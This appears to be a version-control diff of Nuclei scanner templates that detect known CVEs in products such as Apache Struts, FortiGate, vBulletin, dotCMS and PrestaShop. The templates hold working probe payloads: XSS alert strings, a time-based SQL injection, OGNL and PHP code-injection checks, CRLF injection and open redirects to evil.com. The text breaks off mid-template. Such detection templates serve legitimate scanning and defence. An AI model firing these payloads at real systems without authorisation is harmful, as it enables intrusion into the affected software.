- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '\" onfocus=alert(document.domain); autofocus'
- 'Please enter login name &amp; password'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -13,10 +13,11 @@ info:
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2 cvss-score: 7.2
cve-id: CVE-2008-6982
cwe-id: CWE-79 cwe-id: CWE-79
metadata: metadata:
verified: "true" verified: "true"
tags: devalcms,xss,cms,edb tags: cve,cve2008,devalcms,xss,cms,edb
requests: requests:
- method: GET - method: GET

View File

@ -0,0 +1,39 @@
id: CVE-2012-0394
info:
name: Apache Struts Dev Mode OGNL Injection
author: tess
severity: critical
description: |
The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
reference:
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
- https://www.exploit-db.com/exploits/31434
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
- http://www.exploit-db.com/exploits/18329
classification:
cve-id: CVE-2012-0394
metadata:
shodan-query: html:"Struts Problem Report"
verified: "true"
tags: ognl,injection,edb,cve,cve2012,apache,struts
variables:
first: "{{rand_int(1000, 9999)}}"
second: "{{rand_int(1000, 9999)}}"
result: "{{to_number(first)*to_number(second)}}"
requests:
- method: GET
path:
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
matchers-condition: and
matchers:
- type: word
words:
- '{{result}}'
- type: status
status:
- 200

View File

@ -1,7 +1,7 @@
id: CVE-2016-10033 id: CVE-2016-10033
info: info:
name: WordPress PHPMailer < 5.2.18 Remote Code Execution name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
author: princechaddha author: princechaddha
severity: critical severity: critical
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.

View File

@ -1,38 +1,42 @@
id: CVE-2017-14186 id: CVE-2017-14186
info: info:
name: FortiGate SSL VPN Web Portal - Cross Site Scripting name: FortiGate SSL VPN Web Portal - Cross Site Scripting
author: johnk3r author: johnk3r
severity: medium severity: medium
description: | description: |
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack. Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
reference: reference:
- https://www.fortiguard.com/psirt/FG-IR-17-242 - https://www.fortiguard.com/psirt/FG-IR-17-242
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186 - https://nvd.nist.gov/vuln/detail/CVE-2017-14186
classification: - https://fortiguard.com/advisory/FG-IR-17-242
cve-id: CVE-2017-14186 - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
metadata: classification:
verified: true cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
shodan-query: port:10443 http.favicon.hash:945408572 cvss-score: 5.4
tags: cve,cve2017,fortigate,xss,fortinet cve-id: CVE-2017-14186
cwe-id: CWE-79
requests: metadata:
- method: GET shodan-query: port:10443 http.favicon.hash:945408572
path: verified: "true"
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)" tags: cve,cve2017,fortigate,xss,fortinet
requests:
matchers-condition: and - method: GET
matchers: path:
- type: word - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
part: body
words: matchers-condition: and
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"' matchers:
- type: word
- type: word part: body
part: header words:
words: - 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
- "text/html"
- type: word
- type: status part: header
status: words:
- 200 - "text/html"
- type: status
status:
- 200

View File

@ -9,7 +9,7 @@ info:
reference: reference:
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917 - https://nvd.nist.gov/vuln/detail/CVE-2017-8917
- http://www.securitytracker.com/id/1038522 - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2018-1000861 cve-id: CVE-2018-1000861
cwe-id: CWE-502 cwe-id: CWE-502
tags: kev,vulhub,cve,cve2018,jenkin,rce,jenkins tags: kev,vulhub,cve,cve2018,rce,jenkins
requests: requests:
- method: GET - method: GET

View File

@ -1,7 +1,7 @@
id: CVE-2018-14912 id: CVE-2018-14912
info: info:
name: cgit < 1.2.1 Directory Traversal name: cgit < 1.2.1 - Directory Traversal
author: 0x_Akoko author: 0x_Akoko
severity: high severity: high
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.

View File

@ -1,7 +1,7 @@
id: CVE-2018-17422 id: CVE-2018-17422
info: info:
name: dotCMS <5.0.2 - Open Redirect name: DotCMS < 5.0.2 - Open Redirect
author: 0x_Akoko,daffainfo author: 0x_Akoko,daffainfo
severity: medium severity: medium
description: | description: |
@ -16,27 +16,22 @@ info:
cve-id: CVE-2018-17422 cve-id: CVE-2018-17422
cwe-id: CWE-601 cwe-id: CWE-601
metadata: metadata:
verified: true
shodan-query: http.title:"dotCMS" shodan-query: http.title:"dotCMS"
verified: "true"
tags: cve,cve2018,redirect,dotcms tags: cve,cve2018,redirect,dotcms
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "self.location = 'http://www.interact.sh'" - "self.location = 'http://evil.com'"
- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
- type: status
status:
- 200
# Enhanced by md on 2022/10/13 # Enhanced by md on 2022/10/13

View File

@ -19,7 +19,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -27,9 +27,7 @@ requests:
- type: word - type: word
part: body part: body
words: words:
- "phpinfo" - "4cc32a3a81d2bb37271934a48ce4468a"
- "PHP Version"
condition: and
- type: status - type: status
status: status:

View File

@ -1,7 +1,7 @@
id: CVE-2019-10232 id: CVE-2019-10232
info: info:
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
author: RedTeamBrasil author: RedTeamBrasil
severity: critical severity: critical
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature

View File

@ -1,7 +1,7 @@
id: CVE-2019-12314 id: CVE-2019-12314
info: info:
name: Deltek Maconomy 2.2.5 Local File Inclusion name: Deltek Maconomy 2.2.5 - Local File Inclusion
author: madrobot author: madrobot
severity: critical severity: critical
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.

View File

@ -1,7 +1,7 @@
id: CVE-2019-12725 id: CVE-2019-12725
info: info:
name: Zeroshell 3.9.0 Remote Command Execution name: Zeroshell 3.9.0 - Remote Command Execution
author: dwisiswant0,akincibor author: dwisiswant0,akincibor
severity: critical severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters. description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.

View File

@ -1,7 +1,7 @@
id: CVE-2019-13101 id: CVE-2019-13101
info: info:
name: D-Link DIR-600M Authentication Bypass name: D-Link DIR-600M - Authentication Bypass
author: Suman_Kar author: Suman_Kar
severity: critical severity: critical
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.

View File

@ -1,7 +1,7 @@
id: CVE-2019-13392 id: CVE-2019-13392
info: info:
name: MindPalette NateMail 3.0.15 Cross-Site Scripting name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid. description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.

View File

@ -1,7 +1,7 @@
id: CVE-2019-15107 id: CVE-2019-15107
info: info:
name: Webmin <= 1.920 Unauthenticated Remote Command Execution name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
author: bp0lr author: bp0lr
severity: critical severity: critical
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi. description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.

View File

@ -1,7 +1,7 @@
id: CVE-2019-16313 id: CVE-2019-16313
info: info:
name: ifw8 Router ROM v4.31 Credential Discovery name: ifw8 Router ROM v4.31 - Credential Discovery
author: pikpikcu author: pikpikcu
severity: high severity: high
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code. description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.

View File

@ -1,7 +1,7 @@
id: CVE-2019-16662 id: CVE-2019-16662
info: info:
name: rConfig 3.9.2 Remote Code Execution name: rConfig 3.9.2 - Remote Code Execution
author: pikpikcu author: pikpikcu
severity: critical severity: critical
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution. description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.

View File

@ -15,7 +15,10 @@ info:
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2019-16759 cve-id: CVE-2019-16759
cwe-id: CWE-94 cwe-id: CWE-94
tags: rce,kev,seclists,cve,cve2019,vbulletin metadata:
shodan-query: http.component:"vBulletin"
verified: "true"
tags: cve,cve2019,rce,kev,seclists,vbulletin
requests: requests:
- raw: - raw:
@ -24,15 +27,15 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo(); subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word
words:
- "addcc9f9f2f40e2e6aca3079b73d9d17"
- type: status - type: status
status: status:
- 200 - 200
- type: word
words:
- "PHP Version"
# Enhanced by mp on 2022/03/29

View File

@ -0,0 +1,32 @@
id: CVE-2019-6802
info:
name: Pypiserver 1.2.5 - CRLF Injection
author: 0x_Akoko
severity: medium
description: |
CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
reference:
- https://vuldb.com/?id.130257
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
- https://github.com/pypiserver/pypiserver/issues/237
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-6802
cwe-id: CWE-79,CWE-74
metadata:
shodan-query: html:"pypiserver"
verified: "true"
tags: cve,cve2019,crlf,generic,pypiserver
requests:
- method: GET
path:
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
matchers:
- type: word
part: header
words:
- 'Set-Cookie: crlfinjection=1;'

View File

@ -1,7 +1,7 @@
id: CVE-2020-10546 id: CVE-2020-10546
info: info:
name: rConfig 3.9.4 SQL Injection name: rConfig 3.9.4 - SQL Injection
author: madrobot author: madrobot
severity: critical severity: critical
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,

View File

@ -1,7 +1,7 @@
id: CVE-2020-10547 id: CVE-2020-10547
info: info:
name: rConfig 3.9.4 SQL Injection name: rConfig 3.9.4 - SQL Injection
author: madrobot author: madrobot
severity: critical severity: critical
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

View File

@ -7,9 +7,10 @@ info:
description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
reference: reference:
- https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md - https://github.com/grafana/grafana/pull/23254
- https://security.netapp.com/advisory/ntap-20200810-0002/ - https://security.netapp.com/advisory/ntap-20200810-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2020-11110 - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
- https://hackerone.com/reports/1329433
remediation: This issue can be resolved by updating Grafana to the latest version. remediation: This issue can be resolved by updating Grafana to the latest version.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

View File

@ -5,6 +5,9 @@ info:
author: x6263 author: x6263
severity: medium severity: medium
description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request. description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
metadata:
verified: true
shodan-query: title:"prtg"
reference: reference:
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547 - https://nvd.nist.gov/vuln/detail/CVE-2020-11547
@ -21,7 +24,9 @@ requests:
path: path:
- "{{BaseURL}}/public/login.htm?type=probes" - "{{BaseURL}}/public/login.htm?type=probes"
- "{{BaseURL}}/public/login.htm?type=requests" - "{{BaseURL}}/public/login.htm?type=requests"
- "{{BaseURL}}/public/login.htm?type=treestat"
stop-at-first-match: true
req-condition: true req-condition: true
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -33,6 +38,9 @@ requests:
part: body part: body
words: words:
- "prtg_network_monitor" - "prtg_network_monitor"
- "Probes"
- "Groups"
condition: or
- type: status - type: status
status: status:

View File

@ -1,7 +1,7 @@
id: CVE-2020-11991 id: CVE-2020-11991
info: info:
name: Apache Cocoon 2.1.12 XML Injection name: Apache Cocoon 2.1.12 - XML Injection
author: pikpikcu author: pikpikcu
severity: high severity: high
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system. description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.

View File

@ -0,0 +1,34 @@
id: CVE-2020-13121
info:
name: Submitty 20.04.01 - Open redirect
author: 0x_Akoko
severity: medium
description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.
reference:
- https://github.com/Submitty/Submitty/issues/5265
- https://www.cvedetails.com/cve/CVE-2020-13121
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-13121
cwe-id: CWE-601
tags: cve,cve2020,redirect,submitty,oos
requests:
- raw:
- |
POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/authentication/login
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
cookie-reuse: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -1,7 +1,7 @@
id: CVE-2020-13700 id: CVE-2020-13700
info: info:
name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
author: pikpikcu author: pikpikcu
severity: high severity: high
description: | description: |

View File

@ -1,7 +1,7 @@
id: CVE-2020-13937 id: CVE-2020-13937
info: info:
name: Apache Kylin Exposed Configuration File name: Apache Kylin - Exposed Configuration File
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication. description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.

View File

@ -15,7 +15,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408 - https://nvd.nist.gov/vuln/detail/CVE-2020-14408
metadata: metadata:
verified: true verified: true
tags: cve,cve2022,cockpit,agentejo,xss,oss tags: cve,cve2020,cockpit,agentejo,xss,oss
requests: requests:
- method: GET - method: GET

View File

@ -7,9 +7,9 @@ info:
description: | description: |
Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter. Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.
reference: reference:
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
- https://github.com/oria/gridx/issues/433 - https://github.com/oria/gridx/issues/433
- https://nvd.nist.gov/vuln/detail/CVE-2020-19625 - https://nvd.nist.gov/vuln/detail/CVE-2020-19625
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
@ -19,23 +19,18 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word
part: body
words:
- "6ca86c2c17047c14437f55c42c801c10"
- type: status - type: status
status: status:
- 200 - 200
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'
# Enhanced by mp on 2022/04/27 # Enhanced by mp on 2022/04/27

View File

@ -0,0 +1,39 @@
id: CVE-2020-21012
info:
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/hitIer/web_test/tree/master/hotel
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-21012
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,hotel,sqli,unauth
requests:
- raw:
- |
POST /forgot_password.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
btn_forgot=1&email=1%27%20or%20sleep(6)%23
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Hotel Booking System")'
condition: and
# Enhanced by md on 2022/12/08

View File

@ -0,0 +1,48 @@
id: CVE-2020-24902
info:
name: Quixplorer <=2.4.1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24902
cwe-id: CWE-79
metadata:
google-dork: intitle:"My Download Server"
shodan-query: http.title:"My Download Server"
verified: "true"
tags: cve,cve2020,quixplorer,xss
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>&srt=yes"
- "My Download"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -0,0 +1,45 @@
id: CVE-2020-24903
info:
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://seclists.org/bugtraq/2016/Mar/104
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24903
cwe-id: CWE-79
metadata:
shodan-query: http.component:"ASP.NET"
verified: "true"
tags: cve,cve2020,cuteeditor,xss,seclists
requests:
- method: GET
path:
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script></p>"
- "System.Web"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -4,7 +4,7 @@ id: CVE-2020-25213
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info: info:
name: WordPress File Manager Plugin Remote Code Execution name: WordPress File Manager Plugin - Remote Code Execution
author: foulenzer author: foulenzer
severity: critical severity: critical
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files. description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.

View File

@ -1,7 +1,7 @@
id: CVE-2020-25223 id: CVE-2020-25223
info: info:
name: Sophos UTM Preauth Remote Code Execution name: Sophos UTM Preauth - Remote Code Execution
author: gy741 author: gy741
severity: critical severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11. description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.

View File

@ -1,7 +1,7 @@
id: CVE-2020-25506 id: CVE-2020-25506
info: info:
name: D-Link DNS-320 Unauthenticated Remote Code Execution name: D-Link DNS-320 - Unauthenticated Remote Code Execution
author: gy741 author: gy741
severity: critical severity: critical
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.

View File

@ -1,7 +1,7 @@
id: CVE-2020-2551 id: CVE-2020-2551
info: info:
name: Oracle WebLogic Server Remote Code Execution name: Oracle WebLogic Server - Remote Code Execution
author: dwisiswant0 author: dwisiswant0
severity: critical severity: critical
description: | description: |

View File

@ -0,0 +1,40 @@
id: CVE-2020-26248
info:
name: PrestaShop Product Comments <4.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
reference:
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
- https://packagist.org/packages/prestashop/productcomments
